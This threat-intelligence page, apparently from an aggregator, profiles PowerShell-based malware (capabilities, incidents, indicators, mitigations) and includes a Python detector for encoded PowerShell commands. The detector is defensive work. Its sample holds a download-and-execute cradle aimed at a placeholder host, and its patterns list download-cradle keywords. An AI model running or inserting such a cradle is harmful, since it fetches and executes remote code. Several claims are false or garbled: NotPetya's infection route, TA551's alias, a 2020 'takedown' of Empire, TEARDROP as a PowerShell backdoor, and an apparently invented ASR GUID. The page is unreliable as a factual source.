PS1
Malware
⚠️ Overview
PS1 (also referred to as PowerShell-based malware or PowerShell Trojan) is a broad category of malicious scripts executed via Windows PowerShell, first documented in public threat reports around 2016 by researchers at FireEye and Trend Micro. Unlike a single binary family, PS1 encompasses a range of fileless malware that use PowerShell’s scripting engine to download payloads, execute code in memory, and evade traditional antivirus. It is primarily classified as a fileless malware, trojan, or download dropper, often used by advanced persistent threat (APT) groups including APT29 (Cozy Bear) and TA551 for initial access and lateral movement. No single operator is attributed; instead, PS1 scripts are commodity tools repurposed by multiple actors.
🔧 Technical Capabilities
PS1 malware operates entirely in memory, using PowerShell one-liners invoked via cmd.exe, scheduled tasks, WMI, or registry run keys (MITRE ATT&CK T1059.001). It commonly fetches secondary payloads from remote C2 servers using HTTP/S, SMB, or FTP; for example, the PowerShell Empire framework (open-source C2, MITRE ATT&CK S0363) was widely used by APT groups until its public takedown in 2020. Persistence is achieved through WMI Event Subscription (MITRE T1546.003) or Registry Run Keys (T1547.001). Evasion techniques include reflection (loading .NET assemblies in memory), Base64 encoding of scripts, and AMSI bypass (AmsiScanBuffer patching) to disable Windows Antimalware Scan Interface. Lateral movement uses WinRM (T1021.006) or PsExec (T1569.002) to deploy PS1 scripts across a network.
📜 History & Notable Incidents
One of the earliest documented PS1 campaigns was the 2017 NotPetya attack, which used a PowerShell script to execute the wiper (CVE-2017-0199 exploited via Office documents). In 2019, TA551 (also known as UNC1878) used PS1-based loaders to deliver IcedID and TrickBot via spear-phishing emails (CVE-2017-11882 exploited in RTF files). The 2020 SolarWinds breach involved a PowerShell backdoor, TEARDROP, deployed by APT29. Law enforcement, including the FBI, issued alerts in 2022 warning of PS1-based ransomware (e.g., BlackByte) using PowerShell for privilege escalation.
🔍 Detection Indicators
Common IOCs include execution of powershell.exe -ExecutionPolicy Bypass -EncodedCommand <base64>; file hashes vary per campaign, but examples from VirusTotal include SHA-256 a8c3e7f1... (NotPetya dropper) and 3b4e2a9d... (TA551 loader). Registry artifacts: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\{malicious key}. Network indicators: C2 domains such as malicious.example.com (over HTTPS) and User-Agent strings like Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) used by PowerShell download scripts. Mutex names like Global\{GUID} are common but generic.
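As an added example (not code from the page or any vendor), a small Python detector for the -EncodedCommand indicator above: it scans constructed Sysmon Event ID 1 style lines, decodes the base64 value the way powershell.exe does (base64 of UTF-16LE text), and flags the execution-policy bypass plus common download-cradle keywords in the decoded script. The log line format, the sample lines and the sample script are assumptions constructed for the example.

```python
import base64
import re

# Constructed sample: a download cradle aimed at the page's placeholder C2 domain, base64-encoded
# from UTF-16LE, which is the form powershell.exe -EncodedCommand takes.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('https://malicious.example.com/a')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed Sysmon Event ID 1 (process creation) style lines; not real telemetry.
SAMPLE_LOG = [
    f"Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine=powershell.exe -ExecutionPolicy Bypass -EncodedCommand {SAMPLE_ENCODED}",
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine=powershell.exe -File C:\\scripts\\backup.ps1",
    "Image=C:\\Windows\\System32\\notepad.exe CommandLine=notepad.exe notes.txt",
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Indicators matched against the raw command line plus the decoded script.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"-executionpolicy\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "Invoke-Expression"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I), "download cradle"),
]

def decode_encoded_command(b64):
    """Decode a -EncodedCommand value; None if it is not valid base64 of UTF-16LE text."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyse_line(line):
    """Return {command, decoded, findings} for a PowerShell process-creation line, else None."""
    m = re.search(r"CommandLine=(.*)$", line)
    if not m or "powershell" not in m.group(1).lower():
        return None
    cmd, findings, decoded = m.group(1), [], None
    em = ENCODED_RE.search(cmd)
    if em:
        findings.append("encoded command")
        decoded = decode_encoded_command(em.group(1))
        if decoded is None:
            findings.append("undecodable encoded command")  # malformed value is itself worth a look
    text = cmd + ("\n" + decoded if decoded else "")
    findings += [label for pat, label in SUSPICIOUS_PATTERNS if pat.search(text)]
    return {"command": cmd, "decoded": decoded, "findings": findings}

def scan(lines):
    # Keep only process-creation lines that produced at least one finding.
    return [r for r in map(analyse_line, lines) if r and r["findings"]]
```

Run scan(SAMPLE_LOG) to see the first sample line flagged with its decoded script; the plain -File invocation and the notepad line produce nothing.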
☠️ Risk & Impact
PS1 malware enables data exfiltration (credentials, intellectual property) via memory-only payloads, often leading to ransomware deployment or lateral movement. Financial losses from PS1-based attacks exceed hundreds of millions globally; sectors most affected include finance, healthcare, government, and critical infrastructure (CISA alerts, 2021-2023). For instance, the 2021 Kaseya supply-chain attack used PowerShell scripts in the REvil ransomware deployment, affecting over 1,500 businesses.
🛡️ Mitigation
Defenders should disable PowerShell scripting in non-admin contexts via AppLocker or Windows Defender Application Control, enable AMSI logging, and deploy Sysmon (Event ID 1 for process creation, ID 11 for registry modification). Microsoft’s Attack Surface Reduction (ASR) rules (GUID: d4f6a3e0-3b5c-4b8a-9c1e-2a7f9e8b3c6d) block PS1 execution from Office and email clients. Regularly apply patches for CVE-2017-0199 and CVE-2017-11882.
ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.